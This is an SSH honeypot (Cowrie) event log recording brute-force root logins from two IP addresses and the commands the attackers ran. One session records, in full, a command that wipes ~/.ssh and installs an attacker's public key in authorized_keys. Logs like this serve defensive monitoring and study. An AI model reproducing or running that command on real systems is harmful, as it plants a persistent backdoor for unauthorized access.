{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T10:30:10.834883Z","src_ip":"212.227.125.160","session":"821bfc6cc05e"}
{"eventid":"cowrie.login.success","username":"root","password":"2345678","message":"login attempt [root/2345678] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:30:10.911837Z","src_ip":"212.227.125.160","session":"821bfc6cc05e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:30:11.041205Z","src_ip":"212.227.125.160","session":"821bfc6cc05e"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T10:30:11.042046Z","src_ip":"212.227.125.160","session":"821bfc6cc05e"}
{"eventid":"cowrie.login.success","username":"root","password":"123456ABC","message":"login attempt [root/123456ABC] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:30:11.044335Z","src_ip":"212.227.235.229","session":"4c60ef07863e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:30:11.066046Z","src_ip":"212.227.125.160","session":"821bfc6cc05e"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:30:11.067204Z","src_ip":"212.227.125.160","session":"821bfc6cc05e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:30:11.524613Z","src_ip":"212.227.235.229","session":"4c60ef07863e"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T10:30:11.525393Z","src_ip":"212.227.235.229","session":"4c60ef07863e"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T10:30:11.526192Z","src_ip":"212.227.235.229","session":"4c60ef07863e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:30:11.737567Z","src_ip":"212.227.235.229","session":"4c60ef07863e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:30:12.178566Z","src_ip":"212.227.235.229","session":"4c60ef07863e"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T10:30:12.179397Z","src_ip":"212.227.235.229","session":"4c60ef07863e"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T10:30:12.391379Z","src_ip":"212.227.235.229","session":"4c60ef07863e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:30:12.392686Z","src_ip":"212.227.235.229","session":"4c60ef07863e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39083,"dst_ip":"1.2.3.4","dst_port":22,"session":"2664d25d1d99","protocol":"ssh","message":"New connection: 212.227.235.229:39083 (1.2.3.4:22) [session: 2664d25d1d99]","sensor":"my-vps","timestamp":"2025-08-26T10:30:12.565921Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T10:30:12.567090Z","src_ip":"212.227.235.229","session":"2664d25d1d99"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T10:30:12.756312Z","src_ip":"212.227.235.229","session":"2664d25d1d99"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T10:30:13.545684Z","src_ip":"212.227.235.229","session":"2664d25d1d99"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:30:14.732703Z","src_ip":"212.227.235.229","session":"2664d25d1d99"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40478,"dst_ip":"1.2.3.4","dst_port":22,"session":"ae0caf3398d4","protocol":"ssh","message":"New connection: 212.227.235.229:40478 (1.2.3.4:22) [session: ae0caf3398d4]","sensor":"my-vps","timestamp":"2025-08-26T10:30:17.948604Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T10:30:17.949753Z","src_ip":"212.227.235.229","session":"ae0caf3398d4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T10:30:18.165797Z","src_ip":"212.227.235.229","session":"ae0caf3398d4"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:30:19.052155Z","src_ip":"212.227.235.229","session":"ae0caf3398d4"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:30:19.258152Z","src_ip":"212.227.235.229","session":"ae0caf3398d4"}
{"eventid":"cowrie.session.closed","duration":"9.4","message":"Connection lost after 9.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:30:19.266055Z","src_ip":"212.227.235.229","session":"4c60ef07863e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42624,"dst_ip":"1.2.3.4","dst_port":22,"session":"0a79793a4a37","protocol":"ssh","message":"New connection: 212.227.125.160:42624 (1.2.3.4:22) [session: 0a79793a4a37]","sensor":"my-vps","timestamp":"2025-08-26T10:30:26.089092Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:30:26.089860Z","src_ip":"212.227.125.160","session":"0a79793a4a37"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T10:30:26.112182Z","src_ip":"212.227.125.160","session":"0a79793a4a37"}
{"eventid":"cowrie.login.success","username":"root","password":"230589","message":"login attempt [root/230589] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:30:26.191090Z","src_ip":"212.227.125.160","session":"0a79793a4a37"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:30:26.343859Z","src_ip":"212.227.125.160","session":"0a79793a4a37"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T10:30:26.344605Z","src_ip":"212.227.125.160","session":"0a79793a4a37"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:30:26.382774Z","src_ip":"212.227.125.160","session":"0a79793a4a37"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:30:26.383922Z","src_ip":"212.227.125.160","session":"0a79793a4a37"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42630,"dst_ip":"1.2.3.4","dst_port":22,"session":"f6c1d8f45006","protocol":"ssh","message":"New connection: 212.227.125.160:42630 (1.2.3.4:22) [session: f6c1d8f45006]","sensor":"my-vps","timestamp":"2025-08-26T10:30:26.404211Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:30:26.432918Z","src_ip":"212.227.125.160","session":"f6c1d8f45006"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T10:30:26.433982Z","src_ip":"212.227.125.160","session":"f6c1d8f45006"}
{"eventid":"cowrie.login.success","username":"root","password":"23","message":"login attempt [root/23] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:30:26.642846Z","src_ip":"212.227.125.160","session":"f6c1d8f45006"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:30:26.835707Z","src_ip":"212.227.125.160","session":"f6c1d8f45006"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T10:30:26.836480Z","src_ip":"212.227.125.160","session":"f6c1d8f45006"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:30:26.896371Z","src_ip":"212.227.125.160","session":"f6c1d8f45006"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:30:26.897557Z","src_ip":"212.227.125.160","session":"f6c1d8f45006"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42646,"dst_ip":"1.2.3.4","dst_port":22,"session":"cfd64a2ae074","protocol":"ssh","message":"New connection: 212.227.125.160:42646 (1.2.3.4:22) [session: cfd64a2ae074]","sensor":"my-vps","timestamp":"2025-08-26T10:30:26.920679Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:30:26.946019Z","src_ip":"212.227.125.160","session":"cfd64a2ae074"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T10:30:26.947314Z","src_ip":"212.227.125.160","session":"cfd64a2ae074"}
{"eventid":"cowrie.login.success","username":"root","password":"22101985","message":"login attempt [root/22101985] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:30:27.332569Z","src_ip":"212.227.125.160","session":"cfd64a2ae074"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:30:27.471832Z","src_ip":"212.227.125.160","session":"cfd64a2ae074"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T10:30:27.472661Z","src_ip":"212.227.125.160","session":"cfd64a2ae074"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:30:27.523359Z","src_ip":"212.227.125.160","session":"cfd64a2ae074"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:30:27.524600Z","src_ip":"212.227.125.160","session":"cfd64a2ae074"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42662,"dst_ip":"1.2.3.4","dst_port":22,"session":"9f965abf0406","protocol":"ssh","message":"New connection: 212.227.125.160:42662 (1.2.3.4:22) [session: 9f965abf0406]","sensor":"my-vps","timestamp":"2025-08-26T10:30:27.545343Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:30:27.572851Z","src_ip":"212.227.125.160","session":"9f965abf0406"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T10:30:27.573659Z","src_ip":"212.227.125.160","session":"9f965abf0406"}
{"eventid":"cowrie.login.success","username":"root","password":"220690","message":"login attempt [root/220690] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:30:27.730004Z","src_ip":"212.227.125.160","session":"9f965abf0406"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:30:27.860943Z","src_ip":"212.227.125.160","session":"9f965abf0406"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T10:30:27.861673Z","src_ip":"212.227.125.160","session":"9f965abf0406"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:30:27.925868Z","src_ip":"212.227.125.160","session":"9f965abf0406"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:30:27.927218Z","src_ip":"212.227.125.160","session":"9f965abf0406"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42666,"dst_ip":"1.2.3.4","dst_port":22,"session":"3d17250e8be4","protocol":"ssh","message":"New connection: 212.227.125.160:42666 (1.2.3.4:22) [session: 3d17250e8be4]","sensor":"my-vps","timestamp":"2025-08-26T10:30:27.954783Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:30:27.955754Z","src_ip":"212.227.125.160","session":"3d17250e8be4"}
